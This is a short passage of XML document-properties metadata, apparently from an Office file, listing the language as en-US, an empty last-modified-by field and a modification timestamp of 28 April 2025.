  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-28T12:49:58Z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